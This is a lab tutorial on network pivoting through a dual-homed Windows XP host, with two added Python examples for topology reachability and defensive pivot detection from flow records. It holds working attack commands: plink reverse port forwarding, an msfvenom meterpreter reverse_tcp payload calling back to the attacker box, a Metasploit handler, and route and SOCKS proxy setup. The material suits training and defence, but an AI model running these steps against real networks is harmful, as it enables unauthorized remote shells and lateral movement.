October 25, 2016
How to Pivot the Network (Port-Forwarding/Redirection) - A Hands-On Look
Description:
This tutorial is about "moving" through a network (from machine to machine). We use a compromised host as our pivot to move through the network. This tutorial does not contain screenshots. You can create the screenshots yourself as you follow this tutorial ;-)

Prerequisites:
You need (at least) three machines for this tutorial. I suggest using VirtualBox or VMware machines.

The Attacking Box (Kali Linux)
  IP: 192.168.1.16
  Netmask: 255.255.255.0
  Gateway: 192.168.1.1

The pivot host (Windows XP)
  Dual-Homed - Configure 2 Network Cards in VirtualBox!
  FIRST IP: 192.168.1.30
  Netmask: 255.255.255.0
  SECOND IP: 10.0.0.2
  Netmask: 255.0.0.0

Web server (IIS, Apache - Windows or Linux, whatever you like) -> I use a Windows 2012 server
  IP: 10.0.0.10
  Netmask: 255.0.0.0
  There is no need to use a gateway!

Problem:
We want to reach the web server from the attacking box. But how can we do that? Both machines are in different subnets. Try to surf to the web server from the Kali Box: https://10.0.0.10
This does not work!
(If you do not understand the problem at this point I highly suggest you leave this tutorial and get comfortable with network topics such as private network ranges and subnetting.)

Solution:
We use the dual-homed machine to pivot to the web server!

Scenario 1 (Remote Port Forwarding):
We connect to the Windows XP machine using "rdesktop" on the Kali Box. We don't attack the pivot here. We have the credentials.
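As an added example (not part of the original tutorial), the lab topology above modelled with Python's standard-library ipaddress module. It answers the two questions the Problem section raises: which pairs of machines share a network and can talk directly, and which machine sits in both networks and can relay between them. The addresses and masks are the tutorial's; the host labels and helper names are my own.

```python
"""Model the three-machine lab and test direct reachability and bridging.

Added example: the addresses are taken from the tutorial's prerequisites,
the host labels and function names are assumptions of this example.
"""
import ipaddress

# Address/netmask pairs exactly as given in the prerequisites section.
HOSTS = {
    "kali": ["192.168.1.16/255.255.255.0"],
    "xp":   ["192.168.1.30/255.255.255.0", "10.0.0.2/255.0.0.0"],
    "web":  ["10.0.0.10/255.0.0.0"],
}


def interfaces(host):
    """All interfaces of a host as ip_interface objects (address + network)."""
    return [ipaddress.ip_interface(a) for a in HOSTS[host]]


def networks(host):
    """The set of networks a host is directly attached to."""
    return {i.network for i in interfaces(host)}


def directly_reachable(a, b):
    """True if some interface of a is on the same network as some interface of b.

    Without a gateway, this is the only way two hosts can exchange packets.
    """
    return bool(networks(a) & networks(b))


def bridging_hosts(src, dst):
    """Hosts other than src and dst that are attached to a network of src
    AND a network of dst, i.e. candidates for relaying traffic between them."""
    return sorted(
        h for h in HOSTS
        if h not in (src, dst)
        and networks(h) & networks(src)
        and networks(h) & networks(dst)
    )


def multi_homed():
    """Hosts attached to more than one network (the dual-homed machines)."""
    return sorted(h for h in HOSTS if len(networks(h)) > 1)


if __name__ == "__main__":
    print("kali -> web directly:", directly_reachable("kali", "web"))  # False
    print("kali -> xp directly:", directly_reachable("kali", "xp"))    # True
    print("bridges between kali and web:", bridging_hosts("kali", "web"))
    print("multi-homed hosts:", multi_homed())
```

The same two helpers, run over a real asset inventory instead of the three lab hosts, are a quick audit for workstations that quietly join two segments, which is the property the rest of this tutorial relies on.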
- Connect to the Windows XP machine from your Kali Box: rdesktop 192.168.1.30
- Download "plink.exe" from the Kali box to the Windows XP machine (plink.exe can be found on Kali at "/usr/share/windows-binaries/plink.exe"). Copy "plink.exe" to your web server root and start Apache on Kali. Now you can download "plink.exe" on the Windows XP machine.
- Open a command prompt on the Windows XP machine and navigate to the place where you have saved "plink.exe"
- Start the SSH daemon on the Kali Box:
  /etc/init.d/ssh start
- Run the following command on the Windows XP machine (log in with your SSH credentials for Kali):
  plink 192.168.1.16 -P 22 -C -R 127.0.0.1:4444:10.0.0.10:80
  With "-R", sshd on Kali listens on 127.0.0.1:4444 and hands every connection back through the tunnel to the XP machine, which forwards it to 10.0.0.10:80.
- Generate a stand-alone meterpreter executable:
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=443 -f exe -o meterpreter.exe
- Copy meterpreter.exe to Kali's webroot
- Download meterpreter.exe to the XP machine
- Set up the listener on the Kali Box:
  msfconsole
  use exploit/multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST 192.168.1.16
  set LPORT 443
  exploit
- Double-Click on meterpreter.exe and run it on the XP Machine
- Now you have the meterpreter connection from the XP Machine on your Kali Box!
- Type "ifconfig" and see that this host is a dual-homed machine.
- Type "background" to background the session
- Now we have to add a route to our Metasploit session 1 (1 is the session number in Metasploit):
  route add 10.0.0.0 255.0.0.0 1
  Shows: [*] Route added
- Verify that the route was added successfully:
  route print
- Now configure the SOCKS proxy in Metasploit and start it:
  use auxiliary/server/socks4a
  set SRVHOST 127.0.0.1
  run
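As an added example from the defensive side (not part of the original tutorial), a small detector over network flow records that looks for the pattern Scenario 1 produces: a multi-homed host opens an outbound session on 22 or 443 to a peer that is not an approved SSH server and, within a short window, starts sourcing traffic from its other interface into the second network. The flow records, the host inventory, the APPROVED_SSH_SERVERS allowlist and the function names are all constructed for this example; the addresses mirror the lab.

```python
"""Flag multi-homed hosts that open an outbound tunnel-capable session and
then bridge traffic into a second network.

Added example: flows, inventory and allowlist below are constructed to mirror
the tutorial's lab, they are not captured data.
"""
import ipaddress
from collections import namedtuple

Flow = namedtuple("Flow", "ts src sport dst dport")

# Constructed flow records (ts = seconds). The XP box talks to Kali on 22 and
# 443 from its 192.168.1.x interface, then reaches the web server from its
# 10.x interface. 192.168.1.40 is a benign single-homed workstation.
FLOWS = [
    Flow(1000, "192.168.1.30", 1031, "192.168.1.16", 22),
    Flow(1005, "192.168.1.30", 1032, "192.168.1.16", 443),
    Flow(1060, "10.0.0.2",     1033, "10.0.0.10",    80),
    Flow(1100, "192.168.1.40", 50211, "192.168.1.5", 22),
    Flow(1130, "192.168.1.40", 50212, "192.168.1.20", 445),
]

# Constructed asset inventory: host name -> interfaces with prefix length.
# Flow data alone carries no host identity; this join is what makes the
# multi-homing visible.
INVENTORY = {
    "xp-pivot": ["192.168.1.30/24", "10.0.0.2/8"],
    "ws-40": ["192.168.1.40/24"],
}

# Constructed allowlist of servers that workstations legitimately SSH to.
APPROVED_SSH_SERVERS = {"192.168.1.5"}

# Ports on which an outbound session can carry a reverse tunnel.
TUNNEL_PORTS = {22, 443}


def find_pivot_candidates(flows, inventory, approved, window_s=600):
    """Return one finding per (host, peer, port) where a multi-homed host
    opened an unapproved session on a tunnel port and, within window_s
    seconds, originated traffic from another interface to a destination
    outside the tunnel peer's network."""
    ifaces = {h: [ipaddress.ip_interface(i) for i in ips]
              for h, ips in inventory.items()}
    ip_to_host = {str(i.ip): h for h, lst in ifaces.items() for i in lst}
    findings = []
    for host, lst in ifaces.items():
        if len(lst) < 2:
            continue  # a single-homed host cannot bridge two networks
        own = [f for f in flows if ip_to_host.get(f.src) == host]
        for f in own:
            if f.dport not in TUNNEL_PORTS or f.dst in approved:
                continue
            src_ip = ipaddress.ip_address(f.src)
            # Network of the interface that carries the suspected tunnel.
            peer_net = next(i.network for i in lst if src_ip in i.network)
            crossing = [
                g for g in own
                if g.src != f.src                       # other interface
                and 0 <= g.ts - f.ts <= window_s        # shortly after
                and ipaddress.ip_address(g.dst) not in peer_net
            ]
            if crossing:
                findings.append({
                    "host": host,
                    "tunnel_peer": f.dst,
                    "tunnel_port": f.dport,
                    "bridged_to": sorted({g.dst for g in crossing}),
                })
    return findings


if __name__ == "__main__":
    for hit in find_pivot_candidates(FLOWS, INVENTORY, APPROVED_SSH_SERVERS):
        print(hit)
```

Two findings come back for xp-pivot (one per tunnel port, both bridging to 10.0.0.10) and none for ws-40, whose SSH session goes to an approved server and whose single interface cannot bridge anything. The allowlist and the window are the knobs to tune; the inventory join is the part that cannot be skipped, because a plain netflow record shows 192.168.1.30 and 10.0.0.2 as two unrelated sources.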